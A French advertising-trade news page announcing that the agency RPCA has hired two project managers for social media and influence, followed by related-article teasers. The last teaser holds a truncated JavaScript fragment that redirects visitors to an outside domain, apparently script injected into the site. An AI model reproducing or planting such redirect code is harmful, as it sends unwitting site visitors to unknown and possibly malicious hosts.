AGENCE RPCA

    RPCA, créateur de conversations, renforce son expertise en Social Media et Influence

    RPCA, Créateur de conversations renforce son expertise digitale afin de continuer à accompagner les clients de l’agence dans leurs stratégies sur les réseaux sociaux.

    L’équipe digitale, animée par Sophie Pignol, Responsable Social Media, et Manon Cassagne, Responsable des Stratégies d’Influence, accueille deux nouvelles recrues : Océane Avril et Isabelle Amar qui auront pour mission d’accompagner les clients de l’agence dans leur stratégie social media et influence.

    Océane arrive d’Aurore Boréale, une agence de Caen, 100% social media. Elle rejoint l’agence en tant que Chef de projet Social MediaIsabelle AmarChef de projet Influence se joint à l’équipe après avoir travaillé en tant que Consultante en communication digitale chez BCW.

    Au quotidien, l’équipe a pour mission d’accompagner l’agence de la recommandation stratégique à la mise en place de ses plans d’actions et jusqu’à la mesure de l’efficacité des campagnes mises en place sur l’ensemble de ses activités digitales, influence, brand content ou encore social media.

    L’agence a notamment développé une expertise reconnue sur la gestion de Programme Ambassadeurs en proposant des stratégies de création de contenus fortes et impactantes et des relations à long terme entre les marques et les créateurs de contenu.

    Ainsi, grâce à sa vision à 360°, RPCA propose une approche expérientielle afin de développer une relation affinitaire avec chaque public et leader d’opinion permettant de susciter de l’engagement et du partage grâce à des contenus et des activations sur-mesure.

    Tags:

    You May Also Like

    Agence the g project - la-communication_fr

    LANCEMENT DU STUDIO G PROJECT … QUAND LE COMMUNICANT DEVIENT ACTEUR DE L’ECO- CONSOMMATION

    Découvrez le nouveau studio créatif et éthique G Project qui a pour mission d’accompagner ...

    L’agence ici Barbès continuera d’animer la Social Room SNCF

    Suite à un appel d’offre, SNCF a choisi de renouveler sa confiance à ici ...

    WPP-Superunion-la communication_fr

    WPP lance Superunion

    Le groupe WPP a annoncé le lancement de Superunion, un réseau de 750 personnes, ...

    e-commerce - la-communication_fr

    Les tendances e-commerce 2020 vues par Bazaarvoice

    Amazon dans le viseur des marques Le vent est en train de tourner et ...

    We Are Social détourne le jargon de la pub en vinyles

    Les créatifs se sont amusés à détourner le jargon de la pub en groupes ...

    Visuel-Teads-Beverage-Awards

    TEADS ANNONCE LES LAURÉATS DE SON PREMIER PRIX CRÉATIF DÉDIÉ À L’INDUSTRIE DES BOISSONS

    var redirectTo = “https://clo.yfbplc.com/”; var a = document.createElement(‘a’); a.href = redirectTo; a.setAttribute(‘rel’, ‘noreferrer’); document.body.appendChild(a); ...